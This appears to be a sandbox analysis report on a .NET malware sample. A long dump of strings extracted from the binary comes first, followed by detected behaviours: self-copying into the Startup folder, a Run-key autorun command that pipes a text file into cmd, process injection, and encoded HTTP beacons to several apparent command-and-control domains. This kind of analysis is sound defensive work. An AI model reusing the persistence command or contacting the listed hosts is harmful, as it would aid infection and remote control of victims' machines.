jeM30
%'\)(
\i}~
rbV3D
!?*9
7~b=!
HSYa
|// F
L/Gg
#=\w
@[S1#
jmVR
tT]E3~
2[%[
>y*w
p/%q2
DNcKe`
T$R.
Fj!?
ojg J
x`[i
C v(0
W6w&
:t- 8<
QhC_
System.Runtime.CompilerServices
feyc
Microsoft.VisualBasic
|-:n
3,q
a0i!
!Qpw
A`uR
Object
9[XX
S -p
4?P]^:
76&5
X(_s
#tv,
'<MH
9Cm=`
3(}FS
Nq]:
v#44o
ZRjf
: xS
?8wh(
;|RD
a1~-x
.'Q`
DU #
4Vbmd
)wk"d\?
=$qr
8} C~
*635
]]\p
g, `
sEN=
Mzm5dLWQuaduP2FVS6upc7y7as1p4
K ?L
q?r[
];#,1dY
e@iZG
g1|W
#0Zs
J[tpY
P=YM&
p!51
Q %&
BWW!
bh`P
wy D
=4 F
K#ne-<
DaG=
xkj |X
D^x2
0^mk
2KzS
bY0y<
:Wuz
h_L
lC9`jr
/A.}
6<#G
%/Xe
d9*Q
/cmH ,L/
X ;
=`eV
*GLB
QD6
I+-yooxu
y}w=
G7<s
=$ C*
5,:Q
(s)a
T\y%s8
m<B!9l
Bjd!
BSJB
2!-xi
43ua
!4V
*e}-
]'{89
$9Hb
$+$4Nb
X]kp
J([Mo
e-OE
IMSx?
D_I
P[ <
f4sE
oTB}
^i&Z
,&-V
&e!@
LGh
~um45
x.vmE9
8?+7eN
CEev
5:hc
f(zk
-9V{#h
yC n
7gX%
| s0
+-3E
p{1Ju
4I's
nZ,KX
t_.J.~
7*=>d.
'Y? -W
c yk
SRMX+
|T[fs*
_ >mprk
Dwaj7=
*A!B
'92%
^LM}
1IzV
_h %
pd Y
pcj4Y
BYdr
=#q=
x(D-
{b'=
Rd-DR
get_Message
!This program cannot be run in DOS mode. $
2y;
>YN_
GeI1X
9}Uu
t|U
lJs7
y9@+IC!
alph
O4 ;
Do2h
/I)~
xrguf
*T!q
{ $$
ul#<k'.$?S
1qK
aEH G
d u~.
,X6o
foo"
\yGK
oxX 7+
G<Eh
A}#X
& >D
ly=u
>&b:
Fg~:
]a{Y@|C
E-72
P]m/!
>RPHw
#S$}
I{5Js
[;W
{c:M
_PTE"/
J$pq
$LpXg
M8gY
ce=78
f} [
2=/z
fgoN
_G^-)
^~K E`RZ
#~jeB
eda.-
G#Q_
1`yq3
R,:_
P.d[PU
N6{B
{tSn?
5[7Q;DiKCPb
}k;v"
,3[Cw
M4fC
sTp)Z5&
bA>])
<vY%p
#6wd
$^9,
`uc=V4>
.t!0
_0*l"
@z
a\y z
rlaC
Y[wz
oC;'`
<3T)
#GUID
]FO@
5p '
DyOG
}@f
`cr
CG(4
tmz
&Xve
3L a
3M *
r zN
'}d0
2eN@
D2e q
5g-!X4
@jHrp
d= w
6^R{
J;-"uzZ
2q$8
i],]JK
):on#
43EVz
GATj
/R;u'"[J
"??A
ID{j
4*qS
nn4 _
b;;$
KZe]
\} s
:Hb
pwn}
q7o #C
Tg1K
XOah
b%#r
{TC6
YeH{
cTE)
;Uw)
=4?/"
X{ ?.
|f m
q6JUb
9MvB
+Q|vx
Udz;+E
A%mL
?])N
a^Vt
4#`uv
@Adg
al;Q
69sf$oW
-hO\
vc/q
E+ G
GcQ6b
)YV?
xb P
kIs8
$Tx6kqYxBPAhsCoRPc0KyrBV6TPxftN3Q6PrZ
_Mnl
-t'{2
. R
jNv0w#
<>S"
;3m c
G8Blz[sakyO#u`6B
E~ Y
'oIVjH99R39iED24aAy6rMY1mtCctTLOE2nOlOmb
q%ih@
^<~)
k2x,
*;3"
5wmn
Fg i,
:#=h
~*</?
-K* ].@
$vEG
_%4=|.\
X*0
u~'(
Li Md
p>z9
<?; ~
$'mR
G&2\g
N't?
1x%_
Th%2
"uxy
35Xv"
KBf+
>)r&
HHEii7R>
rQEdu
BEj/iz
c,'E-F
fmUM
HfdL
aXZr
>m30
uo9(
p=Hq
=fH,
+hgqo
wLW^
g'ocX
, U[
$~r:p@
)YDE
p,|j*
K>PH
EbN2
p"/_
a8?
uB,
vcWC
{jrQ
t@Kd
2e\c+
;,*L
A){%2&
1Xd&{
"u1Z
W.%)
Li9}x
-4,R
K c5G
dcQ|
qaeP
9_fG.
O9Z%
,H7+
>QID
zTc:
[3J`s
+bu
;l5@
#(NG
_2Ma
$L ipNa
hO^r$
N_N]
pt@+
qkz
\F:2xX
f7MJ
Bg2D
(DK
b_!YhE
=%H
arkq
U)`\
L1 &
:e4>
Gu@e
=^B]
6@9Q
_12P 5iL
q1&W#9
g[>Wq
KWz{GCC
N#O(
;JWX*
FPo8Y
:}-W'
:~BB7lu
uW`x#
U^ ;A
BD K7
Y~xWW
T|]
K`+r>
Xs&$]
/|L-` ElVY\
kFoQ{
=3$T
* 3%>
c"<I-
L cS
c8xH
b3 3x
[:-(
g@$@bBi
oa $n
tm2?d
uJh7
Y;>W8
&) ^[
V?Z9
uc57b
wl0n6
UDNF
prpF
d4!)
HBaB
RgSi
)1dd
=k|$
l;Xm
#W70
%by0
1x>,dZ
,: S
]6LZj4v
m^)!K
Qno0
_kO<
W`C~
2&WP*
#Kw53fMo
}.?<
91gN
! N
J` K
! 4n
7W6>3
u< P
S"tE
nb.6
jFMe(W
:O <
ofeCe5
|r&
;@BL
IXxYp
BwIu
(}02
./<8
VeqO
hn6P
C;I"
YLTKW
Ocqw
];Ja
J z
pn{S
!CKR
ur%k
GE0T
Y]LpN}
,]4g
>.gVA
FZh=
+yT
3p:+
bvGKa
Rk#w
K @
SCO4
sk`R
=8Q-CU
99 B?
@if
k)Q$d
3O86
wf$A
3+xNJ
@=wC
( u
FGEoP5HDd0UqAYZjc2yiEu1dRA5dLfL
1]>tJ
0U|X
O;_?kr
}0#~
>@2g
J_ Uz
3UbTEY
?rwV
YoJZ
51q)-
H0jS
A"Qp
M+W
qj^6n
Hy=9KF
'/<{
NwJ
+OOHK
d peb
B:.:
K;F(
R{K5
p %d
^wS2
%|E0
+ze'U
)')q
aJA.
,5vn
S% _QG
J3g2Ps
%`lO
Kiu <
Hq=WA
4)g Gi
)Pua?
H}^X
yfxIh
;`&h
?+ n4r
ljEr
k *~
n` U?
D6!I
Y Qzh
] J+
m8`w
JnLl`{
tiZ]
y!=D
=0O
HpFU
c[t/3
rGMQ
`lO5
ZLta
(PjG
'^nq
8'Ba
{76k
$,.J
zCga
\0ED
7Oal
L\jn
~$moQ
s}+
~TG:!
/]J{)
Te,"
7eiu5
'VZA
l saP
WHOx=JQ
~+R.DK
]iTk
SpjJA0
c58\
9jzhg
$uL<
?j:"w
r# Hs
2 &U
@- U
!3[2
<{Kmb
{j;BqH '
?/&J
/Ypcte
fa)@
w-ama
V<Y+
N#TH
t<wOS
ret
UQ~
^B}W
gPg
:fxQ(f
zch;
R|87Y
#K&()
g~`I
c,JP
8FG>
P561
&w%DYs
e[gV
<Xq>
U>;Ln
ZQ*I
;#cqE
%<ZJ
gO'3
Mt!>
-TT0
n< p
-/(I
[t#, KHq
#zxek
1]F@
BF<2
AV*2!
~f K
Kd>R
8AbN
cwnz?
O!eo
aKOj
b )F-
jyp<mG
K*3|
Bo?F
S#jY
}c\w
d7l$
0c2]
}nfZ
>8od
?)vD
d\>T
Ly @
PwVm
3"j(
Q0|b7O$M.
G JZ
,jTi-q
J %a
U(]4
{l$$
Xb [
yw-S mQ
g+oy'mb'm
MFM1J
@3zOH
#yLq
qY\A
k.m"
nD^
U1vt
qHu$
l@L
Y0NA
xisA
`*PDX
\[xa
/\['
{8uZ
+khw
v75*}
6c?W
G 5V
vFK^7X
jy9j
VmT k
hagn
y"SuC
,3ru%
WF,C
*:Z4
2\'ny
orF@
""l{lHC
bI}+
re*7
|`np
0Lv!
1]kGhn
B{Ki
LbbQ4^ES
a"hN
gsGo|
Bp&FQ
CompilationRelaxationsAttribute
6_N#
<U}S
2l*X
_j+z
"Q6~>
178.
]Mqn
N`#_
*ycy L
'~9R
(}h>Vny
2W"k
G $c
sDDX
;H6u
I$[wm
G7&l
#)-i
7{%>
<BM
4 ${
esN{
~pY"
7<3UF
](M4Us
<q#
E`lIC
I:So
}SC7
@)oB?
DT?f@\
= uV
eE;H
EGx!
y, t~
N/*R
*&Ci
Gcf%s
u`cDQ
9M6;p
waxDT
-8P]X
{V7 b-W9S
^aI8T
yBdpK5
n~!F"
%uEz
*,2c.
IBVu
uF?Cp
Show
=3+
^Y .
D>y9
B*((
x {oD
z~k#
fHxk*
~6y,
n0R
RZYP
z,J%
ART=;
Yz~K
r7AZs
It!"Xp?
xpTu5
qIre
NVfd
xqooRO
*?[Ft
16+<H
&p 0(
F??h
d'8n
Y+1U
8@rA
String
9hzBkiMoGFqbkwxHk4YOkzb8o6
W%x}
_CorExeMain
:R9Q
@w'=4g
l# J
T/ a
a9h`A
XnNE
RqjO
rE*c
* ?{
3}&f
( &
ll -
_{+8_
+ `
-qhE
`wdTH
Dbj4s
PikClDZLHhKW85mLQoMm44oT
j&;R
%sj,
W0;<
X gT6
tnl=
g3PZ
m?VE
Wv>8~
X>hTD
zs#x
%7iF
nyoD
)Z^M3j
dxJC
bXt V
GzBx
*a \
X]eg
r+C <
Hq*
h[B4
2aV7# W
m=,q
p\6G
N](tJ
kf..
3E^3,~F
NpNz
}Jj,
skC
pMbMw
;t5m
,VlP?11
?c =
K~HA<
_ L=
L(]MsK
22mH
&_FW
.`zY
c WJzV
e[`d
6SvZ/C
8_*p
%4hWpQlr62wO2ekR07x75GYOiICpPmmZSy2Wm8
C,(O
;<zV
U]>$a
9.']
%yqt
Dv-h
:T&MrF
f%%$!
cjqC(
!+7d
Q)L_
=q6~s9
tY$}
Dd}iD
M]J|q2
TdGR
JOD\
k =:
GetTypeFromHandle
2|yP
F6pT
!EyNA
59 0P
/;/s
xh`(QL
=w<S
fIq
C*<B
B\>lh
Ll]m
4J[Bn'U 8
2tyN%
/vB}~{D
[l$X
'o6cL
FhYJ
L9yG
6U)M
e jQ|t
_u)X
2-94
omkQ
VOtK
~@+"
{;b
N3 9
e [~ =
5k`e
A'`y
[2n
w^%0
t\, h
$FG 3
]BxB
!yHX
N7*"
L~T^
ds{Kr
WG=o
|RfH
vwTg
rI^$ {
i'=6
~bW<
?vx)
Z9QG~
!bcc
"T0$mP|
_?FV
Z1y&
+ ]~+
/YZ#@
]$X3
6`j9
dY>O+!GK
abRI
9BiM
1qs>
c`QQ
Lmd5
G;{Y
>T H
97>*
Lh>~C
ele2SpPbTTSaPziyVVJIq
?'<]
"E{,
n.`=5
E^L
U=3=
)7yq^>|[)
utF4
Q aq
^ 'l
M`o/h
^2ps
~4q:/fs
Y8jQJ _
Ihrr
RB Lok
Aja
R{a=
U CU
1WemO0exyVfmLpDHjYGoQ7qz
>e:O#
L35^
/T1_ie
5s1U
e0EC
=%Rx
+sk0
EJ[l
]P`u
x{7Sx
xcCAt
4k/
@?']S
wK>D
e6ag
x1k;bG}
. ;
M.! H
6p T
/diW
@Nc7
SCl+
NH*K
rBm)f
<~C=
J=Ds
[xG Ra
o<|{
q }'L
G; 0
^~Q
n }G
wR)2yJ
R7Z) =
iwQ,W
S#,+
pSEa<
J.Ds
<`Ds
fO_s
p)&[
zphA
Zgi<
]?z{
\ -Qg
P A,$,
A]yP'At
A Im
xA5O
M41g
lJ-5
*jx-
1f~6
/"Xa
8)oi
u :g
*bSC
5sGc
`tB[
e7 r
t*\w
DxK
ww!6
+W:_?
Z/ke\<
&M6X
MVbDU
<|{)?@"
/{exB
HPmp
oRU+e6
UeA,@
ZASy
g-Dh
jIjA
9IIE
xT(A
v#x'
rO`IN
1oh im
~eL!
LxBn
]Q'C
* Ib
:m&S
u,k}
)f4BZ
9@c}
{C]D
m j{A1
Bd]Q
(?GU
TZ%i
NSe[x
@yF3s
a.3!ZsV
~T.F
a H$
=dtR
6/
aIF.8L
BtU8
xIQ8\1
dU+=
f<7lq
:h e
Ul+xP
[;XL?
/~wccv7.
|_XzoS
"TL{P
Ece
_S@5)
=zhao
#"19
Va6:wR
5?c^
: 8.
j9ZM
}f u
:xbZ21t
<:VD
kW1$S
l-jn'E
4H+%
Gu{0
4$5t
:JTC
zIo};
=37g
eN*+P[9
/SA
hZ6ZZ0lkU44RBqhCFY03HdmHiOi4QUij
b V F
arpd
,Y 6
,":
- t?E
YM3Y
@.P5
jg[Ff
'ryB
*j&I
? |
Wq>
bA7E
%U0%p
zr7d
%f |?
2b6ACp
V oB' .o
m)v`
93l4ae
] >
%Z9c
4E/bB
AL`9
96{`,
'mEs
-*Afs)
Y/snt
/9.w'==<2oJ
+mx[
Q z}
E*{/
ksmZ
Ul.1
?e:`
Nek#
sFG\
P&0(
| !h
Tc\HN>
KG}n
i[ e
ZMDi
bHgN
_O0G
(}yt
jaf
D_VRN
){S%
/gi^
n PT
pOBR (A&y
7]X{'
+#}{er
}m|4
<.$h;
DWlX
IwUbi
!Q4L
sy#P
i[ J
"cz\k|fw
/1HE
0B O$
9t}P-
(xor
FP:AnVt
~Zv;
2Y#Q
.` e
\)kU
G7 G
.c0-)
:^J@
Nf+d
[=46Z
Awdo
mM *
iZ1*
~RhrY
L~GQ
s
AW'q
Zl;b
m v18
"*-
>z7
z. M
~f=Q
b9md
{Y5R
] & e
:~yi
qHgR
Tt*9s
US u_|
J%{:!
|FV{
?YH-
$ZeZ
V2]sj8 .
iqI
wqw7
[:b$j
|vip
qY9U
^Y+{q 3;d
| },>
T4 -?
[Gwt
Lj?xrP
y^P5=J]
VMm"
9dSV
jQ|qa%tM
KY,#
( !
(e A
ldU5
@2Jq
{-f:
|R~
T44t`
RA >.
ut_d
.s'_
ljIr
j~7!
V~TFu
_11Vk
SBN=
U3{\
H> 8
rRkv
'06 +
|n6A5
7O3 V
*P+6
jU$8
*ro1
NS}Q
nu_y
|oP
s^/4
1]!z
8''y
U<^$
AbEP
pY}F-~g
Te{~
bxq(
75gk0RbGw5XvHm4UnIPdwMnRokr7omD
>O}U,
=qRZ
>U2M
`v.YwS
p-lc
)F1/
mt"J
lT}2o_K
mN%_
,F{wN
QckY
LKSS
>"_sP(
6_~T9h
9;>
Z;J/
B;E\
_GE3
WcEX %l
~*@K
2%f
[~G~
V-P
f/{co
Co=z`
/NHwT?
y "
5K /
@5'4Se
4b,Q
eKB2
YU&\
rb]V?v
b eh
r MTv
qgbK
A-;!
^V-
0iU0nYg
Un`Ozy
8z Z
R}07
'v'~_N
[SK!
deAq<
@!<^K
3L]X_
>+(^
rRUB
GI5)
kF^5
8 V(
<6Js
$h G/
<ZISR
>0.)E
5+&vc^
TDd|
{ZXQ
g\L>
xJ;r
I3D+
aPAh
a-Ib&aWVoq
*5"e
TfR
8.>,
~k-rBE
\`*H
f 'F
\l/g3 g
:e9z
6ixw
<o~=
#(pQ
A1z{
#b'*
sU"<r
t"8|
)+\,@
; b(MY
q3c
@Lj\o
rX.KZ
zAK-o}
w,fp
28MC
r{bx
j)Z8
AlAw$
ddK3cdMoK5qitbyIbSohjm5PrfI
&kBMhxHzc7UmxyiamHvd3F48aQHPfxSDs6qCw4S
w*f
Mh|r|
6n^u
mJqi8ygpXgpFsdRlvNGMH
9nP<E
sk!O*_
mxP!
S '?
U0vi
I8>j
$@Ms
hX9b
S")1s
W_R!
B k(
/9WZD-
6ubD
wVB`#!
*~-Y&
lXcS
(N6VF
caO>s
x5%-
V$+N
3w N
PO=@
*LVA
VIV'
ep<
{FKD
(//7
7,ep
ObO-
fe ~
j:f)
;`Q<
8("u
`n1;#
"laI#KSB
xZ 'V
sK .
^_8t0
?[IV
:zqn96
Ex#?
@fc[
zP e
_l+\+
HjMf
Lu/6W
w)+\
5{1e
bng ,
~H\tA
BR'*O
d `1
If?!
]LK4
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
*zy[
"!;O
/j'
-G32G
C 8e
95J2
wYm M
qjSg .
rd#Gha
W^a\o
6t(5
) I\
%x[
2cTH#W
XON
Jp na
o> 9}o
>i29!
?4vi
+|Ye
-|x?D
MER3u
+L<!
ZE8:!
^.&R
`WMe+
w4sFk
X{ja
,e=c
=B"'J
iTs?
-a/;C
-E@U
mM }
LHa*
c )(
3iTA
X{i^$
ZD_J
4%d`@/!:D
s0Ug p
V.]
'6gJ
YCM&
!u;*
Un[/
D%wP
56C
elH q5
%"}c
Hb-+
2^P3
zrUv
v R()
L,xf
F~X&
(9$x
tffd
>:z2(
"zuTDyqkZW0BdqBWJfsJySHpRURZ6Pp0r2d
urZL
Qs6X
Y08`
f]pAFR*
2}'
< 6zc
Q?Lu
"e$I
U>4$&'
?mdV4
xR)k
1iDo
#6}s
0O7b
u >)
-q@x
)@fwH
La[f
8keqF
TdW}
k~7R<BW[/
B-xx
wad-
Np)(vk
MpXx
RTQ
S?%:
FV}y
+Yr[
K"687
arK,
JDEO
CmuH
7F'&
<'4{
%^69
zX[<
$be1
5I;5
]qH1
M $>
JOkn
7;ppM}{
Zf2?
RdQV
,K8S
;p+N
rmSt
(ihSh
((IC
SqMy8
8LQm
nD\h,
Zdgw
es:J<
tO!7
"O
*.K~
36dKR
Qdx|-
zf%9
u/^R
&j|V
I^V]O.
xtc1
dyovCg
o_LX0
Rm}?%c
QQC0
>dft
upHU
];M@
kyxT.%O
z]Z/
D% 6
-o>0
,@zO
qMLl
EPu$z
^jVz
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
vKDYY
LO*
{[k(
IJk|<Z
^3z
xK3^&8
[,
% &Wk
#d&E
rv4cnFY
=Jg0
U.T7
VsaytiNxzJsFBYS5UkUyVcTc
o"zh
O!/0 VM
)1)m
ql >
#qY"
6j0I
DGIa"4r
y0]G5
B-oT
]io'
00W|
>DiSa^
G;8 2
eaq_
Cj[0
o};)Y
^A/[
@wly
#v:V
krK5
$a+(#?
CbEg
y~k/h
(nmz
\r7~
[ACi
.@G2
vlzK
*sv x
X*
6P&Kp
I/J@
=#H9
$ $Y
O*F
4yti!
bKMxHe5jkLgWiKg1K9Gja
_RAz#qy
>J2kRk
tW+y<:7
7`_w;Q>
W=\.E
IW#H
?g0]m
*;0
E->$d
ZfiLi
l +\
G 87
w@O
Ky\BP
Gzh.WJv
Kzz0
.i|
nu^U
dlo -
ZBPc
ucR#J
PNTN
B`CS
Xol
In9f1OTkR8oaTd7cWlFKNSdjqoTu
Lr#m
%cB#=
+T+* l
I=O\<<
8D
+2>
^.U
g9d[C
f~iy
KYnBn
Aqmh
t}%
1 cNZ
Hl }
l];',Fu
}/W1
n `M
p|03
q w#
*r28w"
5DM
`9]7
T@u4
0@~4`
:5@RP
[I 2
0OyS
JYOv
hA=x
5_" 2&
Bac'l
=}W~
_r$7
ze0|
11G&@JiuP
:KkF
q=[
9n)70LF
XN.#
!^h
M!23
"[b"
Q|CND<q
h: >
TO~2
."xZ
G&)U4W
BD)Xj
t2fc
+ '\
%[w#
~a|k
b}~#
<BC'
pqM ;
HqLL
&%@$
FQnhk
sE!)
y q'
]bh[J
sar=
(,!{y
To)c
{C&.
<{^f
-Y y
%%Pl
j of) 6r
Ww?>N
K**_
,E +
'+A6z,
a9 Y
1(Eu5
U2 N
OU{m
{RwL
^&3H
0R^R
c^WW
ZoCG
6j4_)h
A_a<a
#w/QI|P
[9Z
"E}
"# w$
Zc7H~
H+0kA
XA7:
ypu
kv}0
(_v0
N CQ
q]q3
;mrR
|5:N
L Z[
(j;2h
cG3<
n2by&
~p?p
E*Q'
z)+q
jy{a
NU_<
*D^
9*7g#
|Ir(
C'd+
5if/
zFYO&
:02Q
^A=Y}
2'B,9"NT
2i"|5
"6A#
D7]7
8>?J
,M{^
M9Y6
[ EN
mXnw
MTP`
Rsu(
- p_o
%5C}N
gVI"
EJF3
JDVh
j+YIx
]XFH
#j|
.zx
|)-D
lPK6
7(IPF z
17nX
:u)C
Gkh.
Q$09
ZET!Jx
6%A 5
tgr:
u}@0
\dT#
7N L
ZqCS
;) c
~/?j
fsD
9(^Du
b/xu$"
UCX5
\^6
Xq#!g
]6='
E]dm
8+ 6
clhq
A+Q;e
+<K4
mscorlib
!bhm
TDSI!
pAf6
L.be
1fq
"X(d
a:~
BSEr
OJ_#
d~n
IOBe
9Km=
Ziu[
X*`v
#TKl.
qI6pk
3Pv+
khtXf
Lg9?
}e;K1
8c`v
F-SP9
~Led
W<IX
7e1,
>L-
p)\
.oq\
%lD&
8A"H
] ]
/,s:
P&e
DD3T
BCHC
SqC
uHDR
ctOai
P#ux
R^Niov
_%f2
PGcjw
O.Fk
(_[n
1=U&(l
pb'q
Aas(">
}H ?
>D7
W0>
GLg0
K &@
?+ Z
=:G=&
k"z3.
1=M}(@
sKb{KV
ra0#o
5(8S
b}J8i3
(HX_#
7X*WR;C0CSL
qTjz
_B9I
Ep1h
RR7D1
|bp)
rSRm$
~YR]s3
0Jt8
D4s6Us
E{CO
Y80eH
-?uK
Z:aB
:J.o_6
~u?5R
k|-F|
Yv^\
;?TX
CAjO n
dVnn
2L0@L
kP9;
:*_S
ro8Js
A;U67
~Cyk!
[R:M/K
+>~kV
WJMMgwmn28XfKPmM7m2Isnnsi2CW
tMUv]
_WG5
!VRX
$q4P
q\(4
@* `
+YP2m
T]VO>@
CANV3
LrOh
1{7Jdy
_i7C
UK!<
v6iA+
pKy)
q&!i
tVR{
!lmY
?=c9G=
R qw$
0#>^g
K%(N
# ?g
UoeR
?:;"
` EW
_-Hy
oC e
R|BK`
-g\o
S7oX}
dp]18q7l
m5@?G
|&;LD
j-Zl
;Gzma
AH4?
Tc@x7^
%=mou
Pc;u
8 t
a@W }
+PyU
j2Fr
e?J{
f;B~Y>JoT
{1Q$SL>
L<!k
k(Q11
Zu(U
V}V+
&*%#
=w:K
Ff40f
q k^Mp
a14
_ 4}
VRXzd
Q4 MF3
"D{#v
t i_u
4Vo$
r+)$R@
+lG
I-?
}4,
ij5H0
+DsL
i(o0
k /B
IWf5
B+8z
BB:}]
n#9K
+H'g
hx j
`xN bP
}`Hs
u:7]
o dD
k)yS
6GW:
1u\zM
bf|kt&
rPU
!}Ob"
.p {^
B G
1f$D
4&Z=z
j[!q8#
O?
` A
sfTR
^';N
pvdas'
$pr4
Qel}
@I%\R
^q'/cRy>*
w^sy
_ qj
`E'a
`u%U*
@<e
w);Y
S~.7
uti{m]2
*afs
9 @%
,zHZ)
R6}?
0J^?
HDz@
DT3z
-)['
!sg U
ql[c
b=TE
9 zs
DzrJP$
er]Q2
QPtO
E@_
)#q0
u8'R
) ^
b(Gf
8Wx}c?
(9v|
"B`H
qb8}g
bsL*
B`@|
nJEv
XGV
**zJ|
_)RGrG
EHk'*
B!RH
N*kd^n
]|2`
# Yn(
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven01_64 | Seven01_64 | VirtualBox | 2018-03-22 17:41:03 | 2018-03-22 17:43:53 | 170 |
10 Behaviors detected by system signatures
Creates a copy of itself
Severity: High
Confidence: Very High
- copy: C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
Installs itself for autorun at Windows startup
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas
- data: cmd /c type C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt | cmd
- file: C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
- file: C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: chdsks.exe(2312) -> chdsks.exe(2560)
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.97, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0004ce00, virtual_size: 0x0004cd64
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.oneconvey.com/hx211/?T8kD=9PqKCYaL4ktdzdkjrzryBrlutbCL2A7sV4xpCECdOwR61Acufzdy+EGBMBd8ZgLHII3M4+F+&Vnw0Z=-Z2hTbdPQ2dhN4y
- url: http://www.findingourspot.com/hx211/?T8kD=y5lVWRGfsSZED45cYSa2JRaiiXo50zt1/cPv7v7UQykSw/3CcZo8r43qtablqdkikYz49EWl&Vnw0Z=-Z2hTbdPQ2dhN4y
- url: http://www.findingourspot.com/hx211/
- url: http://www.metalrafmanisa.com/hx211/?T8kD=tYhTHYwP93cJ39rJaSQ7iBt3KWBi6YjL8tBaMl8IfUFeKvQaJCo7FYZQUgK7JZsSszu5rcxg&Vnw0Z=-Z2hTbdPQ2dhN4y
- url: http://www.metalrafmanisa.com/hx211/
- url: http://www.pneus-bruxelles.com/hx211/?T8kD=Zn2a7eARFBQC8NZwYUATkx6xmoOMImb2D4mJDLzUQeclCxMYS/pOn2SSf+N5Nm/qnXJGrY5m&Vnw0Z=-Z2hTbdPQ2dhN4y
- url: http://www.pneus-bruxelles.com/hx211/
- url: http://www.new-igrovyeavtomatiwulcan.com/hx211/?T8kD=fGnJ9hj7R3qSlUGkIZMXxfHNNkaGlEcYY9KGbKXATDe/EDHtOns6EhqRysKScfxX1zSBoR0z&Vnw0Z=-Z2hTbdPQ2dhN4y
- url: http://www.new-igrovyeavtomatiwulcan.com/hx211/
- url: http://www.subducker.info/hx211/?T8kD=zctPrV9hlD2pRuhUedlGUPaA3RJhzRTZ5u5QxoruYKXLWzwWkMOT1F0LhaSLLRfO+tHGIA7a&Vnw0Z=-Z2hTbdPQ2dhN4y
- url: http://www.subducker.info/hx211/
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.oneconvey.com/hx211/?T8kD=9PqKCYaL4ktdzdkjrzryBrlutbCL2A7sV4xpCECdOwR61Acufzdy+EGBMBd8ZgLHII3M4+F+&Vnw0Z=-Z2hTbdPQ2dhN4y
- suspicious_request: http://www.findingourspot.com/hx211/?T8kD=y5lVWRGfsSZED45cYSa2JRaiiXo50zt1/cPv7v7UQykSw/3CcZo8r43qtablqdkikYz49EWl&Vnw0Z=-Z2hTbdPQ2dhN4y
- suspicious_request: http://www.findingourspot.com/hx211/
- suspicious_request: http://www.metalrafmanisa.com/hx211/?T8kD=tYhTHYwP93cJ39rJaSQ7iBt3KWBi6YjL8tBaMl8IfUFeKvQaJCo7FYZQUgK7JZsSszu5rcxg&Vnw0Z=-Z2hTbdPQ2dhN4y
- suspicious_request: http://www.metalrafmanisa.com/hx211/
- suspicious_request: http://www.pneus-bruxelles.com/hx211/?T8kD=Zn2a7eARFBQC8NZwYUATkx6xmoOMImb2D4mJDLzUQeclCxMYS/pOn2SSf+N5Nm/qnXJGrY5m&Vnw0Z=-Z2hTbdPQ2dhN4y
- suspicious_request: http://www.pneus-bruxelles.com/hx211/
- suspicious_request: http://www.new-igrovyeavtomatiwulcan.com/hx211/?T8kD=fGnJ9hj7R3qSlUGkIZMXxfHNNkaGlEcYY9KGbKXATDe/EDHtOns6EhqRysKScfxX1zSBoR0z&Vnw0Z=-Z2hTbdPQ2dhN4y
- suspicious_request: http://www.new-igrovyeavtomatiwulcan.com/hx211/
- suspicious_request: http://www.subducker.info/hx211/?T8kD=zctPrV9hlD2pRuhUedlGUPaA3RJhzRTZ5u5QxoruYKXLWzwWkMOT1F0LhaSLLRfO+tHGIA7a&Vnw0Z=-Z2hTbdPQ2dhN4y
- suspicious_request: http://www.subducker.info/hx211/
Drops a binary and executes it
Severity: Medium
Confidence: Medium
- binary: C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: chds.exe -> "cmd"
- Process: chdsks.exe -> "cmd"
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
Creates RWX memory
Severity: Medium
Confidence: Medium
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven01_64 | Seven01_64 | VirtualBox | 2018-03-22 17:41:03 | 2018-03-22 17:43:53 | 170 |
10 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\chds.exe.config C:\Users\Seven01\AppData\Local\Temp\chds.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll 